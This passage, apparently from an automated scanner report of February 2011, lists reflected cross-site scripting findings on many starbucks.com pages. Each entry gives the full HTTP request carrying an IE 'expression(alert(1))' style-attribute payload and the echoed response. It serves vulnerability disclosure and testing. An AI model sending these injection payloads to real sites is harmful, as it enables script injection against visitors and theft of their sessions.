Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:25 GMT
Connection: close
Content-Length: 43161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment/recycling?a8710"style="x:expression(alert(1))"183500e045d=1"/>
...[SNIP]...

2.305. http://www.starbucks.com/responsibility/environment/water [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/water

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd1dc"style%3d"x%3aexpression(alert(1))"3a75d5838b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd1dc"style="x:expression(alert(1))"3a75d5838b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /responsibility/environment/water?cd1dc"style%3d"x%3aexpression(alert(1))"3a75d5838b9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:30 GMT
Connection: close
Content-Length: 39187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment/water?cd1dc"style="x:expression(alert(1))"3a75d5838b9=1"/>
...[SNIP]...

2.306. http://www.starbucks.com/responsibility/learn-more/goals-and-progress [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/goals-and-progress

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e2e8"style%3d"x%3aexpression(alert(1))"0acfa560360 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e2e8"style="x:expression(alert(1))"0acfa560360 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /responsibility/learn-more/goals-and-progress?4e2e8"style%3d"x%3aexpression(alert(1))"0acfa560360=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:18 GMT
Connection: close
Content-Length: 45450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/goals-and-progress?4e2e8"style="x:expression(alert(1))"0acfa560360=1" />
...[SNIP]...

2.307. http://www.starbucks.com/responsibility/learn-more/policies [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/policies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dacc1"style%3d"x%3aexpression(alert(1))"58441f58f39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dacc1"style="x:expression(alert(1))"58441f58f39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /responsibility/learn-more/policies?dacc1"style%3d"x%3aexpression(alert(1))"58441f58f39=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:16 GMT
Connection: close
Content-Length: 38100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/policies?dacc1"style="x:expression(alert(1))"58441f58f39=1"/>
...[SNIP]...

2.308. http://www.starbucks.com/responsibility/learn-more/relationships [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/relationships

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39d95"style%3d"x%3aexpression(alert(1))"d979f153017 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39d95"style="x:expression(alert(1))"d979f153017 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/learn-more/relationships?39d95"style%3d"x%3aexpression(alert(1))"d979f153017=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:16 GMT
Connection: close
Content-Length: 48018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/relationships?39d95"style="x:expression(alert(1))"d979f153017=1"/>
...[SNIP]...

2.309. http://www.starbucks.com/responsibility/learn-more/shared-values-blog [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/shared-values-blog

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa51c"style%3d"x%3aexpression(alert(1))"92ca21ea562 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa51c"style="x:expression(alert(1))"92ca21ea562 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/learn-more/shared-values-blog?fa51c"style%3d"x%3aexpression(alert(1))"92ca21ea562=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:46 GMT
Connection: close
Content-Length: 46392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/shared-values-blog?fa51c"style="x:expression(alert(1))"92ca21ea562=1"/>
...[SNIP]...

2.310. http://www.starbucks.com/responsibility/learn-more/starbucks-shared-planet [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/starbucks-shared-planet

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21608"style%3d"x%3aexpression(alert(1))"cf8f3b757dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21608"style="x:expression(alert(1))"cf8f3b757dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/learn-more/starbucks-shared-planet?21608"style%3d"x%3aexpression(alert(1))"cf8f3b757dc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:34 GMT
Connection: close
Content-Length: 37394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/starbucks-shared-planet?21608"style="x:expression(alert(1))"cf8f3b757dc=1"/>
...[SNIP]...

2.311. http://www.starbucks.com/responsibility/sourcing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab705"style%3d"x%3aexpression(alert(1))"0db2c74b13d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab705"style="x:expression(alert(1))"0db2c74b13d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/sourcing?ab705"style%3d"x%3aexpression(alert(1))"0db2c74b13d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:01 GMT
Connection: close
Content-Length: 51277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing?ab705"style="x:expression(alert(1))"0db2c74b13d=1"/>
...[SNIP]...

2.312. http://www.starbucks.com/responsibility/sourcing/cocoa [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/cocoa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 649df"style%3d"x%3aexpression(alert(1))"f64e12d5982 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 649df"style="x:expression(alert(1))"f64e12d5982 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/sourcing/cocoa?649df"style%3d"x%3aexpression(alert(1))"f64e12d5982=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:54 GMT
Connection: close
Content-Length: 38743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/cocoa?649df"style="x:expression(alert(1))"f64e12d5982=1"/>
...[SNIP]...

2.313. http://www.starbucks.com/responsibility/sourcing/coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4ba4"style%3d"x%3aexpression(alert(1))"aa5721e012a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c4ba4"style="x:expression(alert(1))"aa5721e012a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/sourcing/coffee?c4ba4"style%3d"x%3aexpression(alert(1))"aa5721e012a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:09 GMT
Connection: close
Content-Length: 40989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/coffee?c4ba4"style="x:expression(alert(1))"aa5721e012a=1"/>
...[SNIP]...

2.314. http://www.starbucks.com/responsibility/sourcing/farmer-support [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/farmer-support

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57860"style%3d"x%3aexpression(alert(1))"35fa26ea488 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 57860"style="x:expression(alert(1))"35fa26ea488 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/sourcing/farmer-support?57860"style%3d"x%3aexpression(alert(1))"35fa26ea488=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:45 GMT
Connection: close
Content-Length: 39451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/farmer-support?57860"style="x:expression(alert(1))"35fa26ea488=1"/>
...[SNIP]...

2.315. http://www.starbucks.com/responsibility/sourcing/store-products [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/store-products

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4c42"style%3d"x%3aexpression(alert(1))"3279581907e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a4c42"style="x:expression(alert(1))"3279581907e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/sourcing/store-products?a4c42"style%3d"x%3aexpression(alert(1))"3279581907e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:32 GMT
Connection: close
Content-Length: 38439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/store-products?a4c42"style="x:expression(alert(1))"3279581907e=1"/>
...[SNIP]...

2.316. http://www.starbucks.com/responsibility/sourcing/tea [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/tea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3bf3"style%3d"x%3aexpression(alert(1))"a81c545b7d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3bf3"style="x:expression(alert(1))"a81c545b7d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/sourcing/tea?d3bf3"style%3d"x%3aexpression(alert(1))"a81c545b7d9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:08 GMT
Connection: close
Content-Length: 37019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/tea?d3bf3"style="x:expression(alert(1))"a81c545b7d9=1"/>
...[SNIP]...

2.317. http://www.starbucks.com/responsibility/wellness [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/wellness

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7967c"style%3d"x%3aexpression(alert(1))"1b512706177 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7967c"style="x:expression(alert(1))"1b512706177 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/wellness?7967c"style%3d"x%3aexpression(alert(1))"1b512706177=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:56 GMT
Connection: close
Content-Length: 41668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/wellness?7967c"style="x:expression(alert(1))"1b512706177=1"/>
...[SNIP]...

2.318. http://www.starbucks.com/search [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5e7f"style%3d"x%3aexpression(alert(1))"ea56a668f54 was submitted in the keywords parameter. This input was echoed as a5e7f"style="x:expression(alert(1))"ea56a668f54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?keywords=%27a5e7f"style%3d"x%3aexpression(alert(1))"ea56a668f54 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/smooth
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.1.10.1297134218; _chartbeat2=vqos4oan0hnfddev

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:03:39 GMT
Content-Length: 34084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords='a5e7f"style="x:expression(alert(1))"ea56a668f54"/>
